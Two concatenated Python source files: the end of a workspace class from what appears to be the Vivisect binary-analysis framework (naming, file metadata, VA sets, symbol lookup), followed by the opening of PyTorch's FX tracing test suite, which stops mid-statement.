If va falls within a known function in the workspace, we return "funcname+<delta>".
If not, and the va falls within a mapped binary, we return "filename+<delta>"
'''
name = self.name_by_va.get(va)
if name is not None or not smart:
return name
# TODO: by previous symbol?
# by function
baseva = self.getFunction(va)
basename = self.name_by_va.get(baseva, None)
if self.isFunction(va):
basename = 'sub_0%x' % va
# by filename
if basename is None:
basename = self.getFileByVa(va)
if basename is None:
return None
baseva = self.getFileMeta(basename, 'imagebase')
delta = va - baseva
if delta:
pom = ('', '+')[delta>0]
name = "%s%s%s" % (basename, pom, hex(delta))
else:
name = basename
return name
def makeName(self, va, name, filelocal=False, makeuniq=False):
"""
Set a readable name for the given location by va. There
*must* be a Location defined for the VA before you may name
it. You may set a location's name to None to remove a name.
makeuniq allows Vivisect to append some number to make the name unique.
This behavior allows for colliding names (eg. different versions of a function)
to coexist in the same workspace.
default behavior is to fail on duplicate (False).
"""
if filelocal:
segtup = self.getSegment(va)
if segtup is None:
self.vprint("Failed to find file for 0x%.8x (%s) (and filelocal == True!)" % (va, name))
if segtup is not None:
fname = segtup[SEG_FNAME]
if fname is not None:
name = "%s.%s" % (fname, name)
oldva = self.vaByName(name)
# If that's already the name, ignore the event
if oldva == va:
return
if oldva is not None:
if not makeuniq:
raise DuplicateName(oldva, va, name)
else:
logger.debug('makeName: %r already lives at 0x%x', name, oldva)
# tack a number on the end
index = 0
newname = "%s_%d" % (name, index)
newoldva = self.vaByName(newname)
while self.vaByName(newname) not in (None, newname):
# if we run into the va we're naming, that's the name still
if newoldva == va:
return newname
logger.debug('makeName: %r already lives at 0x%x', newname, newoldva)
index += 1
newname = "%s_%d" % (name, index)
newoldva = self.vaByName(newname)
name = newname
self._fireEvent(VWE_SETNAME, (va,name))
return name
def saveWorkspace(self, fullsave=True):
if self.server is not None:
return
modname = self.getMeta("StorageModule")
filename = self.getMeta("StorageName")
if modname is None:
raise Exception("StorageModule not specified!")
if filename is None:
raise Exception("StorageName not specified!")
# Usually this is "vivisect.storage.basicfile
mod = self.loadModule(modname)
# If they specified a full save, *or* this event list
# has never been saved before, do a full save.
if fullsave:
mod.saveWorkspace(self, filename)
else:
mod.saveWorkspaceChanges(self, filename)
self._createSaveMark()
def loadFromFd(self, fd, fmtname=None, baseaddr=None):
"""
Read the first bytes of the file descriptor and see if we can identify the type.
If so, load up the parser for that file type, otherwise raise an exception.
Returns file md5
"""
mod = None
fd.seek(0)
if fmtname is None:
bytes = fd.read(32)
fmtname = viv_parsers.guessFormat(bytes)
mod = viv_parsers.getParserModule(fmtname)
if hasattr(mod, "config"):
self.mergeConfig(mod.config)
fd.seek(0)
filename = hashlib.md5( fd.read() ).hexdigest()
fname = mod.parseFd(self, fd, filename, baseaddr=baseaddr)
self.initMeta("StorageName", filename+".viv")
# Snapin our analysis modules
self._snapInAnalysisModules()
return fname
def _saveSymbolCaches(self):
if not self.config.vdb.SymbolCacheActive:
return
pathstr = self.config.vdb.SymbolCachePath
symcache = e_symcache.SymbolCachePath(pathstr)
symsbyfile = collections.defaultdict(list)
# Get the image base addresses
imgbases = {}
for fname in self.getFiles():
imgbases[ fname ] = self.getFileMeta(fname,'imagebase')
for va,name in self.name_by_va.items():
mmap = self.getMemoryMap(va)
if mmap is None:
continue
symva = va - imgbases.get(mmap[3], va)
if symva:
symtype = e_resolv.SYMSTOR_SYM_SYMBOL
if self.isFunction(va):
symtype = e_resolv.SYMSTOR_SYM_FUNCTION
symsbyfile[mmap[3]].append((symva, 0, name, symtype))
for filenorm, symtups in symsbyfile.items():
symhash = self.getFileMeta(filenorm, 'SymbolCacheHash')
if symhash is None:
continue
self.vprint('Saving Symbol Cache: %s (%d syms)' % (symhash,len(symtups)))
symcache.setCacheSyms( symhash, symtups )
def loadFromFile(self, filename, fmtname=None, baseaddr=None):
"""
Read the first bytes of the file and see if we can identify the type.
If so, load up the parser for that file type, otherwise raise an exception.
( if it's a workspace, trigger loadWorkspace() as a convenience )
Returns the basename the file was given on load.
"""
mod = None
if fmtname is None:
fmtname = viv_parsers.guessFormatFilename(filename)
if fmtname in ('viv', 'mpviv'):
self.loadWorkspace(filename)
return self.normFileName(filename)
mod = viv_parsers.getParserModule(fmtname)
fname = mod.parseFile(self, filename, baseaddr=baseaddr)
self.initMeta("StorageName", filename+".viv")
# Snapin our analysis modules
self._snapInAnalysisModules()
return fname
def loadFromMemory(self, memobj, baseaddr, fmtname=None):
"""
Load a memory map (or potentially a mapped binary file)
from the memory object's map at baseaddr.
"""
mod = None
if fmtname is None:
bytez = memobj.readMemory(baseaddr, 32)
fmtname = viv_parsers.guessFormat(bytez)
# TODO: Load workspace from memory?
mod = viv_parsers.getParserModule(fmtname)
mod.parseMemory(self, memobj, baseaddr)
mapva, mapsize, mapperm, mapfname = memobj.getMemoryMap(baseaddr)
if not mapfname:
mapfname = 'mem_map_%.8x' % mapva
self.initMeta('StorageName', mapfname+".viv")
# Snapin our analysis modules
self._snapInAnalysisModules()
def getFiles(self):
"""
Return the current list of file objects in this
workspace.
"""
return self.filemeta.keys()
def normFileName(self, filename):
normname = os.path.basename(filename).lower()
# Strip off an extension
if normname.find('.') != -1:
parts = normname.split('.')
normname = '_'.join(parts[:-1])
ok = string.letters + string.digits + '_'
chars = list(normname)
for i in range(len(chars)):
if chars[i] not in ok:
chars[i] = '_'
normname = ''.join(chars)
#if normname[0].isdigit():
#normname = '_' + normname
return normname
def addFile(self, filename, imagebase, md5sum):
"""
Create and add a new vivisect File object for the
specified information. This will return the file
object which you may then use to do things like
add imports/exports/segments etc...
"""
nname = self.normFileName(filename)
if nname in self.filemeta:
raise Exception("Duplicate File Name: %s" % nname)
self._fireEvent(VWE_ADDFILE, (nname, imagebase, md5sum))
return nname
def addEntryPoint(self, va):
'''
Add an entry point to the definition for the given file. This
will hint the analysis system to create functions when analysis
is run.
NOTE: No analysis is triggered by this function.
'''
self.setVaSetRow('EntryPoints', (va,))
def getEntryPoints(self):
'''
Get all the parsed entry points for all the files loaded into the
workspace.
Example: for va in vw.getEntryPoints():
'''
return [ x for x, in self.getVaSetRows('EntryPoints') ]
def setFileMeta(self, fname, key, value):
"""
Store a piece of file specific metadata (python primatives are best for values)
"""
if fname not in self.filemeta:
raise Exception("Invalid File: %s" % fname)
self._fireEvent(VWE_SETFILEMETA, (fname, key, value))
def getFileMeta(self, filename, key, default=None):
"""
Retrieve a piece of file specific metadata
"""
d = self.filemeta.get(filename)
if d is None:
raise Exception("Invalid File: %s" % filename)
return d.get(key, default)
def getFileMetaDict(self, filename):
'''
Retrieve the file metadata for this file as a key:val dict.
'''
d = self.filemeta.get(filename)
if d is None:
raise Exception('Invalid File: %s' % filename)
return d
def getFileByVa(self, va):
segtup = self.getSegment(va)
if segtup is None:
return None
return segtup[SEG_FNAME]
def getLocationDistribution(self):
# NOTE: if this changes, don't forget the report module!
totsize = 0
for mapva, mapsize, mperm, mname in self.getMemoryMaps():
totsize += mapsize
loctot = 0
ret = {}
for i in range(LOC_MAX):
cnt = 0
size = 0
for lva,lsize,ltype,tinfo in self.getLocations(i):
cnt += 1
size += lsize
loctot += size
tname = loc_type_names.get(i, 'Unknown')
ret[i] = (tname, cnt, size, int((size/float(totsize))*100))
# Update the undefined based on totals...
undeftot = totsize-loctot
ret[LOC_UNDEF] = ('Undefined', 0, undeftot, int((undeftot/float(totsize)) * 100))
return ret
#################################################################
#
# VA Set API
#
def getVaSetNames(self):
"""
Get a list of the names of the current VA lists.
"""
return self.vasets.keys()
def getVaSetDef(self, name):
"""
Get the list of (name, type) pairs which make up the
rows for this given VA set (the first one *always* the VA, but
you can name it as you like...)
"""
x = self.vasetdefs.get(name)
if x is None:
raise InvalidVaSet(name)
return x
def getVaSetRows(self, name):
"""
Get a list of the rows in this VA set.
"""
x = self.vasets.get(name)
if x is None:
raise InvalidVaSet(name)
return x.values()
def getVaSet(self, name):
"""
Get the dictionary of va:<rowdata> entries.
"""
x = self.vasets.get(name)
if x is None:
raise InvalidVaSet(name)
return x
def addVaSet(self, name, defs, rows=()):
"""
Add a va set:
name - The name for this VA set
defs - List of (<name>,<type>) tuples for the rows (va is always first)
rows - An initial set of rows for values in this set.
"""
self._fireEvent(VWE_ADDVASET, (name, defs, rows))
def delVaSet(self, name):
"""
Delete a VA set by name.
"""
if name not in self.vasets:
raise Exception("Unknown VA Set: %s" % name)
self._fireEvent(VWE_DELVASET, name)
def setVaSetRow(self, name, rowtup):
"""
Use this API to update the row data for a particular
entry in the VA set.
"""
self._fireEvent(VWE_SETVASETROW, (name, rowtup))
def getVaSetRow(self, name, va):
'''
Retrieve the va set row for va in the va set named name.
Example:
row = vw.getVaSetRow('WootFunctions', fva)
'''
vaset = self.vasets.get( name )
if vaset is None:
return None
return vaset.get( va )
def delVaSetRow(self, name, va):
"""
Use this API to delete the rowdata associated
with the specified VA from the set.
"""
if name not in self.vasets:
raise Exception("Unknown VA Set: %s" % name)
self._fireEvent(VWE_DELVASETROW, (name, va))
#################################################################
#
# Shared Workspace APIs
#
def chat(self, msg):
uname = e_config.getusername()
# FIXME this should be part of a UI event model.
self._fireEvent(VWE_CHAT, (uname, msg))
def iAmLeader(self, winname):
'''
Announce that your workspace is leading a window with the
specified name. This allows others to opt-in to following
the nav events for the given window name.
Example:
vw.iAmLeader('WindowTitle')
'''
if not self.server:
raise Exception('iAmLeader() requires being connected to a server.')
user = e_config.getusername()
self.server._fireEvent(VTE_MASK | VTE_IAMLEADER, (user,winname))
def followTheLeader(self, winname, expr):
'''
Announce a new memory expression to navigate to if if a given window
is following the specified user/winname
Example:
vw.followTheLeader('FunExample', 'sub_08042323')
'''
if not self.server:
raise Exception('followTheLeader() requires being connected to a server.')
user = e_config.getusername()
self.server._fireEvent(VTE_MASK | VTE_FOLLOWME, (user,winname, expr))
#################################################################
#
# Color Map API
#
def getColorMaps(self):
"""
Return a list of the names of the given color maps
"""
return self.colormaps.keys()
def addColorMap(self, mapname, colormap):
"""
Add a colormap dictionary with the given name for the map.
(A colormap dictionary is va:color entries)
"""
self._fireEvent(VWE_ADDCOLOR, (mapname, colormap))
def delColorMap(self, mapname):
self._fireEvent(VWE_DELCOLOR, mapname)
def getColorMap(self, mapname):
"""
Return the colormap dictionary for the given map name.
"""
return self.colormaps.get(mapname)
def _getNameParts(self, name, va):
'''
Return the given name in three parts:
fpart: filename, if applicable (for file-local names)
npart: base name
vapart: address, if tacked on the end
If any of these are not applicable, they will return None for that field.
'''
fpart = None
npart = name
vapart = None
fname = self.getFileByVa(va)
vastr = '_%.8x' % va
if name.startswith(fname + '.'):
fpart, npart = name.split('.', 1)
elif name.startswith('*.'):
skip, npart = name.split('.', 1)
if npart.endswith(vastr) and not npart == 'sub' + vastr:
npart, vapart = npart.rsplit('_', 1)
return fpart, npart, vapart
def _addNamePrefix(self, name, va, prefix, joinstr=''):
'''
Add a prefix to the given name paying attention to the filename prefix, and
any VA suffix which may exist.
This is used by multiple analysis modules.
Uses _getNameParts.
'''
fpart, npart, vapart = self._getNameParts(name, va)
if fpart is None and vapart is None:
name = joinstr.join([prefix, npart])
elif vapart is None:
name = fpart + '.' + joinstr.join([prefix, npart])
elif fpart is None:
name = joinstr.join([prefix, npart])
else:
name = fpart + '.' + joinstr.join([prefix, npart]) + '_%s' % vapart
return name
##########################################################
#
# The envi.symstore.resolver.SymbolResolver API...
#
def getSymByName(self, name):
# Check for a sym
va = self.vaByName(name)
if va is not None:
return e_resolv.Symbol(name, va, 0)
# check for the need for a deref.
d = self.filemeta.get(name)
if d is not None:
return VivFileSymbol(self, name, d.get("imagebase"), 0, self.psize)
def getSymByAddr(self, addr, exact=True):
name = self.getName(addr)
if name is None:
if self.isValidPointer(addr):
name = "loc_%.8x" % addr
if name is not None:
#FIXME fname
#FIXME functions/segments/etc...
return e_resolv.Symbol(name, addr, 0)
def setSymHint(self, va, idx, hint):
'''
Set a symbol hint which will be used in place of operand
values during disassembly among other things...
You may also set hint=None to delete sym hints.
'''
self._fireEvent(VWE_SYMHINT, (va, idx, hint))
def getSymHint(self, va, idx):
h = self.getFref(va, idx)
if h is not None:
f = self.getFunction(va)
loctup = self.getFunctionLocal(f, h)
if loctup:
return loctup[1]
return self.symhints.get((va, idx), None)
class VivFileSymbol(e_resolv.FileSymbol):
# A namespace tracker thingie...
def __init__(self, vw, fname, base, size, width=4):
self.vw = vw
e_resolv.FileSymbol.__init__(self, fname, base, size, width)
def getSymByName(self, name):
return self.vw.getSymByName("%s.%s" % (self.name, name))
def getVivPath(*pathents):
dname = os.path.dirname(__file__)
dname = os.path.abspath(dname)
return os.path.join(dname, *pathents)
|
test_fx.py
|
# Owner(s): ["oncall: fx"]
import builtins
import contextlib
import copy
import functools
import inspect
import math
import numbers
import io
import operator
import os
import pickle
import sys
import torch
import traceback
import typing
import types
import warnings
import unittest
import torch.nn.utils._stateless as _stateless
from math import sqrt
from torch.multiprocessing import Process
from torch.testing import FileCheck
from torch.testing._internal.common_methods_invocations import op_db
from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests
import torch.utils._pytree as pytree
import torch.fx._pytree as fx_pytree
from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap, PH, CodeGen
from torch.fx.node import Target, Argument, _format_arg
from torch.fx.passes import shape_prop
from torch.fx.immutable_collections import immutable_dict, immutable_list
from torch.fx.experimental.rewriter import RewritingTracer
from torch.fx.operator_schemas import get_signature_for_torch_op
from copy import deepcopy
from collections import namedtuple
from torch.fx.proxy import TraceError
from torch.fx._compatibility import _BACK_COMPAT_OBJECTS, _MARKED_WITH_COMATIBLITY
from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401
from fx.test_dce_pass import TestDCE # noqa: F401
from fx.test_fx_const_fold import TestConstFold # noqa: F401
from fx.test_fx_param_shape_control_flow import TestConstParamShapeInControlFlow # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import AnnotationsTest # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import TypeCheckerTest # noqa: F401
from typing import Any, Callable, Dict, NamedTuple, List, Optional, Tuple, Union
from torch.testing._internal.common_utils import (
IS_FBCODE,
IS_MACOS,
IS_WINDOWS,
TEST_WITH_ROCM,
find_library_location,
run_tests,
)
from torch.testing._internal.jit_utils import JitTestCase
from fx.named_tup import MyNamedTup
try:
from torchvision import models as torchvision_models
HAS_TORCHVISION = True
except ImportError:
HAS_TORCHVISION = False
skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision")
class SimpleTest(torch.nn.Module):
def forward(self, x):
return torch.relu(x + 3.0)
def a_non_torch_leaf(a, b):
return a + b
# Used for test_autowrap_function. Autowrapped functions need to be global
def fx_int(x: float) -> int:
return int(x)
def fx_int_x2(x: float) -> int:
return int(x) * 2
# used in test_pytree. It's all the way out here because pickling a GraphModule
# that uses Point errors out if Point is local to the function
Point = namedtuple('Point', ['x', 'y'])
# Test wrap() passing both a function name as well as a function
# directly
def a_lifted_leaf(a, b):
return a[0] + a[1] + b
wrap('a_lifted_leaf')
# Test wrapping twice doesn't break anything
wrap('a_lifted_leaf')
def a_lifted_leaf2(a, b):
return a[0] + a[1] + b
wrap(a_lifted_leaf2)
wrap('len')
wrap('getattr')
def wrapped_named_tup(p1, *, p2):
return p1.x + p2.y
wrap(wrapped_named_tup)
@wrap
def wrapped_via_decorator(a):
return a + 1
wrap('wrapped_with_submodule')
def wrapped_with_submodule(x: torch.Tensor, batchnorm1d: torch.nn.BatchNorm1d):
return batchnorm1d(x)
real_wrapped_via_decorator = wrapped_via_decorator
real_a_lifed_leaf = a_lifted_leaf
real_a_lifed_leaf2 = a_lifted_leaf2
_sqrt = sqrt
wrap('wrapper_fn')
def wrapper_fn(x):
return torch.foo(x)
class Pair(NamedTuple):
x : torch.Tensor
y : torch.Tensor
def _custom_fx_repr_fn(self) -> str:
return f"Pair(x={_format_arg(self.x)}, y={_format_arg(self.y)})"
# for testing pytrees
class Foo(object): # noqa: B209
def __init__(self, a, b):
self.a = a
self.b = b
class TestFX(JitTestCase):
def setUp(self):
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
if not (TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS):
lib_file_path = find_library_location('libtorchbind_test.so')
torch.ops.load_library(str(lib_file_path))
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None):
"""Check that an nn.Module's results match the GraphModule version
for a given set of args/kwargs.
"""
kwargs = kwargs if kwargs else {}
ref_outs = m(*args, **kwargs)
gm = symbolic_trace(m)
gm.graph.lint()
test_outs = gm(*args, **kwargs)
self.assertEqual(ref_outs, test_outs)
def test_graph_module(self):
class MySub(torch.nn.Module):
def __init__(self):
super().__init__()
self.w = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.w + x
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(4, 3)
self.sub_mod = MySub()
self.w = torch.nn.Parameter(torch.rand(3))
def forward(self, A, B, c):
t = torch.sigmoid(A) + self.lin(c)
return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3))
m = MyModule()
gm = symbolic_trace(m)
ms = torch.jit.script(gm)
class M2(torch.nn.Module):
def forward(self, A):
m, idx = torch.max(A, 0)
return m + 1, idx + 1
m2 = M2()
gm2 = symbolic_trace(m2)
class T(torch.nn.Module):
def forward(self, A, b=4, *args, c=5, **kwargs):
x = A + 1 + args[0] + kwargs['3']
return x
t = T()
symbolic_trace(t)
# test for issue described at https://github.com/pytorch/pytorch/issues/63883
class M3(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
m3 = M3()
gm3 = symbolic_trace(m3)
new_instance = gm3.__new__(type(gm3))
new_instance.__init__(gm3, gm3.graph)
x = torch.randn(5, 3)
torch.testing.assert_allclose(new_instance(x), torch.relu(x))
def test_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(torch.sin(x + y), gm(x, y))
def test_args_kwargs(self):
class T(torch.nn.Module):
def forward(self, *args, **kwargs):
x = args[0] + kwargs['foo']
return x
t = T()
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_args_kwargs_no_self(self):
class T(torch.nn.Module):
def forward(*args, **kwargs): # noqa: B902
self = args[0]
return torch.relu(args[1])
t = T()
with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'):
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_fx_shifts(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x << 3, x >> 3
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_fx_and_or(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x & x, x | x
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_dict(self):
class MyDictMod(torch.nn.Module):
def forward(self, d):
return d['3'].relu(), {'4' : d['3'].neg()}
input_dict = {'3': torch.rand(3, 4)}
m = MyDictMod()
self.checkGraphModule(m, (input_dict,))
def test_matmul_tracing(self):
const = torch.randn(3)
def matmul_f(x):
return x @ const
mod = symbolic_trace(matmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), matmul_f(inp))
def rmatmul_f(x):
return const @ x
mod = symbolic_trace(rmatmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), rmatmul_f(inp))
def test_disallow_override(self):
# Custom delegate to disallow in-place tensor operations
class NoMutableCallTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
name = target if isinstance(target, str) else torch.typename(target)
if name[-1] == '_':
raise RuntimeError('In-place operations are not supported')
return super().create_node(kind, target, args, kwargs, name)
# Test method
class MyInplaceMod(torch.nn.Module):
def forward(self, x):
x.add_(3.0)
return x
m = MyInplaceMod()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m)
# Test free function
class MyInplaceMod2(torch.nn.Module):
def forward(self, x):
torch.log_(x)
return x
m2 = MyInplaceMod2()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m2)
# Test symbolic node as an arg
class MyInplaceMod3(torch.nn.Module):
def forward(self, x):
y = torch.ones(3, 4)
y.add_(x)
return x
m3 = MyInplaceMod3()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m3)
def test_leaf_module(self):
# Custom delegate to make it so that there are no leaf modules, everything
# should get traced through
class NoLeafModulesTracer(Tracer):
def is_leaf_module(self, m, qualname):
return False
class MyReluMod(torch.nn.Module):
def __init__(self):
super().__init__()
self.relu = torch.nn.ReLU()
def forward(self, x):
return self.relu(x)
mrm = MyReluMod()
sym = NoLeafModulesTracer().trace(mrm)
for node in sym.nodes:
self.assertNotEqual(node.op, 'call_module')
sym.lint()
def test_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf2', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_wrapped_via_decorator(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(m).transform()
self.assertIn('wrapped_via_decorator', transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
m = symbolic_trace(M())
self.assertIn("wrapped_with_submodule", m.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), m(input))
def test_wrapped_retrace(self):
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
retraced = symbolic_trace(m)
self.assertIn('wrapped_via_decorator', retraced.code)
self.assertEqual(retraced(0), 1)
def test_graph_edit_with_proxy(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
gm.graph.lint()
self.assertEqual(gm(3, 4), 14)
def test_graph_unique_names(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
seen_names : Set[str] = set()
for node in gm.graph.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_stack_traces(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
tracer = torch.fx.Tracer()
tracer.record_stack_traces = True
graph = tracer.trace(M())
# saving the original list because we will insert new nodes as a part of a test
orig_graph_nodes = list(graph.nodes)
for node in orig_graph_nodes:
if node.op == 'output':
continue
self.assertTrue(node.stack_trace is not None)
assert 'test_fx.py' in node.stack_trace
# verify that copying the node does not lose the stack trace
new_node = graph.node_copy(node)
self.assertTrue(new_node.stack_trace is not None)
assert 'test_fx.py' in new_node.stack_trace
def test_graph_unique_names_manual(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1')
c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
graph2 = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
graph2.graph_copy(graph, val_map)
seen_names : Set[str] = set()
for node in graph2.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_unpack(self):
class M(torch.nn.Module):
def forward(self, a, b):
c, d = a
return c + d + b
a = (torch.rand(1), torch.rand(1))
b = torch.rand(1)
m = M()
self.checkGraphModule(m, (a, b))
def test_native_callable(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
raise unittest.SkipTest("non-portable load_library call used in test")
# This test exercises the case where we use FX to translate from Python
# code to some native callable object
#
# For the purposes of testing, we use ElementwiseInterpreter defined
# in test_custom_class.cpp.
#
# We test that we can
# 1) Construct a native callable from FX IR
# 2) Construct a drop-in replacement module that delegates to the
# native callable rather than the original code
# 3) Run both the original code and native callable wrapper with
# equivalent results
# 4) TorchScript compile the native callable wrapper and confirm
# equivalent results with the reference
# 5) TorchScript serialize and deserialize the native callable
# and confirm equivalent results with the reference
# We use this simple Module as a reference computation
class MySimpleMod(torch.nn.Module):
def forward(self, x):
return 3.0 * x + x
msm = MySimpleMod()
# This is what a lowering pass might look like: a function that takes
# a valid nn.Module, symbolically traces it, lowers the Module to some
# representation, and wraps that representation up into another
# nn.Module instance that handles dispatch to the compiled/lowered code.
def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module:
# ===== Stage 1: Symbolic trace the module =====
mod = symbolic_trace(orig_mod)
# ===== Stage 2: Lower GraphModule representation to the C++
# interpreter's instruction format ======
instructions = []
constant_idx = 0
constants = {}
fn_input_names = []
target_to_name = {
operator.add : "add",
operator.mul : "mul"
}
output_node : Optional[Node] = None
# For each instruction, create a triple
# (instruction_name : str, inputs : List[str], output : str)
# to feed into the C++ interpreter
for n in mod.graph.nodes:
target, args, out_name = n.target, n.args, n.name
assert len(n.kwargs) == 0, "kwargs currently not supported"
if n.op == 'placeholder':
# Placeholders specify function argument names. Save these
# for later when we generate the wrapper GraphModule
fn_input_names.append(target)
elif n.op == 'call_function':
assert target in target_to_name, "Unsupported call target " + target
arg_names = []
for arg in args:
if not isinstance(arg, Node):
# Pull out constants. These constants will later be
# fed to the interpreter C++ object via add_constant()
arg_name = f'constant_{constant_idx}'
constants[arg_name] = torch.tensor(
[arg] if isinstance(arg, numbers.Number) else arg)
arg_names.append(arg_name)
constant_idx += 1
else:
arg_names.append(arg.name)
instructions.append((target_to_name[target], arg_names, out_name))
elif n.op == 'output':
if output_node is not None:
raise RuntimeError('Multiple output nodes!')
output_node = n
else:
raise RuntimeError('Unsupported opcode ' + n.op)
interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter()
# Load constants
for k, v in constants.items():
interpreter.add_constant(k, v)
# Specify names for positional input arguments
interpreter.set_input_names(fn_input_names)
# Load instructions
interpreter.set_instructions(instructions)
# Specify name for single output
assert isinstance(output_node.args[0], torch.fx.Node)
interpreter.set_output_name(output_node.args[0].name)
# ===== Stage 3: Create a wrapper GraphModule around the interpreter =====
class WrapperModule(torch.nn.Module):
def __init__(self, interpreter):
super().__init__()
self.interpreter = interpreter
wrapper = WrapperModule(interpreter)
# Create a graph that: 1) Takes function arguments 2) Invokes the interpreter
# 3) Returns the speficied return value
# FIXME: The following code could be greatly simplified by symbolic_trace'ing
# the wrapper with a Tracer that considers the Wrapper instance a root
# module, however, I can't get `__call__` exposed on TorchBind classes
# without it messing up Python `hasattr` for some reason. More digging
# into CPython's implementation of hasattr is probably in order...
graph = torch.fx.Graph()
# Add placeholders for fn inputs
placeholder_nodes = []
for name in fn_input_names:
placeholder_nodes.append(graph.create_node('placeholder', name))
# Get the interpreter object
interpreter_node = graph.create_node('get_attr', 'interpreter')
# Add a node to call the interpreter instance
output_node = graph.create_node(
